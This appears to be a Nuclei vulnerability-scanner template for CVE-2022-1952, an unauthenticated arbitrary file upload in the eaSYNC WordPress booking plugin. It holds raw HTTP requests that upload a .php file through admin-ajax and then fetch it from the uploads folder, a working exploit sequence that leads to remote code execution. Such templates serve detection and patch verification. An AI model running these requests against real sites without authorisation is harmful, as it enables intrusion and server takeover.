id: CVE-2022-1952 info: name: eaSYNC < 1.1.16 - Unauthenticated Arbitrary File Upload author: theamanrawat severity: critical description: | The Free Booking Plugin for Hotels, Restaurant and Car Rental WordPress plugin before 1.1.16 suffers from insufficient input validation which leads to arbitrary file upload and subsequently to remote code execution. An AJAX action accessible to unauthenticated users is affected by this issue. An allowlist of valid file extensions is defined but is not used during the validation steps. reference: - https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04 - https://wordpress.org/plugins/easync-booking/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1952 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1952 cwe-id: CWE-434 metadata: verified: true tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive requests: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37 Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059 --------------------------98efee55508c5059 Content-Disposition: form-data; name="action" easync_session_store --------------------------98efee55508c5059 Content-Disposition: form-data; name="type" car --------------------------98efee55508c5059 Content-Disposition: form-data; name="with_driver" self-driven --------------------------98efee55508c5059 Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php" Content-Type: application/octet-stream --------------------------98efee55508c5059-- - | GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1 Host: {{Hostname}} Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37 - | GET /wp-content/uploads/{{filename}}.php HTTP/1.1 Host: {{Hostname}} req-condition: true matchers: - type: dsl dsl: - contains(all_headers_3, "text/html") - status_code_3 == 200 - contains(body_1, 'success\":true') - contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9') condition: and extractors: - type: regex name: filename group: 1 regex: - 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php' internal: true